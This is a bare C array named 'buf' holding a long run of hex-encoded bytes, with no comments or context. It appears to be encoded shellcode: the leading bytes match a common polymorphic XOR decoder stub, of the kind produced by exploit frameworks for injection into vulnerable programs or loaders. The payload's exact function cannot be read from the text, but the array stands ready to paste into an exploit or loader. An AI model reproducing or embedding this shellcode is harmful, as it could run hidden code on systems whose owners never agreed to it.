unsigned char buf[] = 
"\xbb\x77\x02\x9f\x18\xda\xd7\xd9\x74\x24\xf4\x58\x29\xc9"
"\x66\xb9\x17\x01\x31\x58\x17\x03\x58\x17\x83\xe8\xfc\xe2"
"\x82\xd9\x45\xc1\x18\xfa\x8d\x48\x5c\x80\x11\xe0\xc7\xb4"
"\x24\x9c\x4e\xa6\xb7\x50\xe3\xdc\x34\x51\x07\xe0\x69\x41"
"\x59\x91\x29\xe5\x22\x51\x4d\x11\x83\xad\x07\x65\x3e\x46"
"\x19\x02\x5f\xb3\x51\x31\x31\xf1\xf0\x5e\x25\x26\xd4\xa8"
"\x6b\xa6\xfc\xd8\xac\x9f\x53\x7a\x74\x41\x6f\x78\xfe\xa9"
"\x0d\x6b\x6b\xa3\x24\x92\xe8\x95\xad\x63\x52\x31\x26\x02"
"\x7e\xa4\x83\xe5\x49\x91\x50\xe9\x27\x8e\x8c\x80\x62\x6b"
"\x99\x28\x29\x97\xc3\xe3\xfc\x28\xb9\x48\xc3\x98\xae\x26"
"\x19\x97\x62\x6d\xc3\x17\x9b\xdd\x0c\xd2\x82\x0a\x51\x60"
"\x24\x89\xec\xe4\x7c\xe8\x0b\x88\x40\x78\xda\x66\x5b\x90"
"\xa5\x9b\xc1\xb7\x06\x28\x7d\x12\xc4\x36\x71\x28\xee\xbd"
"\xe0\x76\xf5\xfd\xb8\x29\x40\x1c\xec\x6b\xab\x98\xef\xfc"
"\x7a\x91\x04\xa6\x48\x57\x33\x25\x94\x93\x55\xa5\xe7\xdb"
"\x9a\xc4\xf6\x81\xe9\x14\x57\x15\x70\x1e\x70\xf3\x86\x58"
"\x4e\xe1\xd4\x81\x93\xc8\xd8\xb3\xa0\x11\xb6\x73\xaf\x75"
"\xcf\x4c\x02\x04\xf6\x48\xf2\xdf\x6e\x37\xe6\x03\xa1\x0e"
"\x83\xc3\x75\x92\xbf\x65\x90\x8e\xf4\x86\xc5\x60\xae\xae"
"\x6d\x78\x15\x95\x47\xdd\x1c\x74\x5b\x07\xe4\x5f\x6a\x5e"
"\x75\x52\xbf\x77\xd7\x09\x56\x75\x98\x73\xca\xd2\x8b\x04"
"\x6b\xe9\x97\xc3\xd1\x73\xa7\x5c\x0c\x7c\x38\xe7\x91\x51"
"\xa6\xb4\xf4\xaf\xfa\x49\x0b\xfb\x88\x57\xc7\x19\xca\x73"
"\x1a\x9d\xcc\xad\x8b\x1d\xd1\xcd\x26\xfa\x75\xbf\x66\x69"
"\xa4\x30\x01\xa1\x0f\x44\xff\x3f\xa1\xa5\xae\xf9\xd3\x68"
"\xfa\x2b\xc2\x50\xb9\xa0\x3d\xfe\xaa\xb8\x5a\x59\x5e\x6e"
"\xd9\x14\x54\x06\xd5\x5b\x20\x5a\x80\x37\xed\x25\x69\x23"
"\x40\xe2\xbc\x30\x87\xce\x94\xac\x40\x11\xc9\xb4\x31\x1d"
"\x97\xdf\xd8\x20\xc7\x43\xcc\x9f\xcd\xed\x47\x6e\x08\x14"
"\x26\xca\x29\x5a\x29\x63\x62\x1f\xc4\x36\x4e\x43\x68\xa3"
"\x1b\xf0\x47\x83\xd5\x97\x59\x5d\x4e\xfd\x88\xe7\xc5\xbc"
"\x0d\x1a\x4e\xa2\xf8\x80\xf5\xc4\xd8\xa7\x05\xc5\xcd\xbd"
"\xf8\xe1\xed\xeb\x86\x77\x53\xfb\x56\x9c\x9b\x94\x0f\xa2"
"\xb4\x83\xd8\xd7\x80\x4e\x24\x4b\x8d\x56\x6d\xc2\xf5\xb5"
"\x46\xca\xbc\xda\xf1\x19\x4b\x0c\x14\x8c\x13\xaf\x3a\xa6"
"\x6f\x11\x9e\x79\x7a\xc8\xe1\xdd\xea\x6a\x60\x75\xd8\x95"
"\xc6\x78\xbf\xfa\x51\x09\xca\xc2\x62\x44\xcd\x61\x26\x61"
"\x52\x97\xd8\x08\xff\xa8\xda\x71\xbf\x60\x55\x88\x83\x3d"
"\x34\xac\x9e\xb8\xb1\xcb\x44\x0d\x47\x4a\x0d\xef\x7a\x46"
"\xfd\x5b\xa9\xdf\xfb\x20\x52\x09\xd5\x0c\xeb\xa5\x3f\xcd"
"\x42\x1c\x30\x7e\x79\xeb\xb5\xe9\xa9\xf4\x2b\x80\x25\xd4"
"\xc7\x2f\xb5\x8c\xd2\x43\xae\xd1\xb8\xb8\x63\xfb\x28\xcb"
"\x18\xb9\x69\xef\x8c\xd0\xc9\xff\xbc\xce\xc6\x35\x3a\xff"
"\xe2\x6d\x0f\x9d\xbb\x22\x5e\x32\x72\xff\x28\x62\xf8\x0f"
"\x96\x4d\x8d\x21\xa0\xf4\x9d\xd1\x79\x2a\xa4\xb8\x13\xe1"
"\x09\x0b\x23\x4f\x28\x84\x9c\xd1\xec\xf6\xff\x76\xef\x08"
"\x64\x36\xdf\x87\xd3\xa3\x95\x6d\x1a\xa2\xc0\xd9\x3e\x03"
"\x87\x89\x3a\x24\x4a\xcb\xb2\xd0\xd7\x89\x14\x24\x77\x10"
"\xf4\x41\x68\x31\x41\x5e\xe1\xb0\x37\x22\xbb\x78\x96\x95"
"\x14\x12\x4e\xc9\xc7\x7e\xe4\xce\x61\xf7\xca\xd1\xde\x51"
"\xe3\x01\x0a\x36\x4d\x61\x8a\x25\x5e\x72\xbe\x26\x04\x88"
"\x1e\x3c\x56\xf4\x65\x31\xeb\xf5\xd4\xa3\xe2\x4d\x40\xc5"
"\x28\xb1\x88\x56\x99\x02\x4f\x1b\x16\xe7\x92\x9f\xac\xd3"
"\xd6\xe0\x48\xdd\x64\xf9\xcb\x6b\x9c\xd8\x54\xee\x58\x91"
"\xa7\x77\x8a\x61\x9a\xe1\x69\xcf\x79\xbd\x45\x3e\x6c\x28"
"\xa1\x53\x54\x07\xc0\x2e\x22\x52\x93\xf7\x96\x22\x8d\x60"
"\xbe\xbd\xf1\xb8\x4a\xd3\x48\x84\xe3\x40\xed\xc4\x18\x5f"
"\x60\x3b\x0a\xa8\x91\xf3\x04\xd2\x9a\xff\x8b\x26\xb3\xed"
"\x01\x3e\x06\x0c\x2b\x05\x76\xa3\x2a\x72\x82\x5e\x08\xd5"
"\x38\xdc\xf3\x1c\x85\x04\x90\x1c\x38\xe3\x96\x87\x52\xf8"
"\xd3\x3e\xef\x67\xb6\xbd\x45\x42\x03\x4b\x78\xa3\xb5\x81"
"\xe5\x0e\x77\x8e\xf5\x0e\xf8\x4e\x0c\x3f\xe1\xf5\x70\xa5"
"\x47\x1d\xa7\x5d\x8f\x8e\x87\x7b\x5c\x45\x01\x7b\xf5\x9c"
"\x1e\x5d\x23\xed\xb6\x4f\x1d\x75\x35\x4c\xab\xd0\x3e\xdf"
"\xbb\x2f\x9b\x56\xf1\xb7\x6b\xb2\x6e\xa5\x7e\xdc\x09\x6c"
"\x72\xb7\xec\x36\xe8\x68\xe8\x74\xa2\xe1\x17\xff\xda\xf2"
"\x58\x25\x91\x85\xcd\x7e\xa8\x8f\xfc\xc0\xb3\x93\x0e\xc5"
"\x26\x94\x78\xf0\xda\xed\x4c\x8a\x23\x92\xc8\x62\xf7\x4a"
"\x5c\xeb\x22\xcb\x92\x97\x7f\x94\xb9\xa2\x2e\xc3\x04\xd6"
"\x76\xd8\x4b\xa4\x1a\x0a\x4a\xfc\x14\xb3\x27\xf4\x1c\xe3"
"\xd1\x6b\x8a\xaa\x7c\x9b\xd6\xa7\x98\x58\xd8\xca\x5a\x75"
"\xdb\x29\x11\xc1\x29\x24\xaa\xc9\x93\x4c\xd8\xa8\x71\x3b"
"\xec\xed\x99\xfe\x67\x13\xc8\xb9\x95\xf6\x2b\xbc\x58\x48"
"\xb6\xc2\x04\x9a\x57\x11\x77\xd3\x2c\x56\x5a\xd2\xa1\x6b"
"\x92\x35\x10\xe7\xca\x42\xc6\x3b\xbb\x50\xb5\xff\x9a\x5e"
"\xd5\x81\x28\xfc\xab\x6b\x01\xa8\xa1\xff\x2f\x49\x02\x87"
"\x99\x2a\x13\x61\xfe\x7e\xa5\x80\xdf\x5e\x8c\x01\x4d\x55"
"\x5f\x16\x30\xd8\x6c\x01\x28\xc8\x77\xdc\x06\xa8\x01\x33"
"\xd4\x16\xcb\xaa\x27\x73\xbe\x02\x26\x4a\xdb\x5d\x4a\x72"
"\x11\xac\x12\x80\x19\xe6\xe9\x49\x5c\xc6\x28\xcb\x8e\xed"
"\xc1\xbf\xc2\xb7\x4c\xe5\x83\x0c\x30\x78\x1a\x57\xc9\x51"
"\x49\x03\x0d\x1e\xd8\x02\xd6\x42\x35\x3a";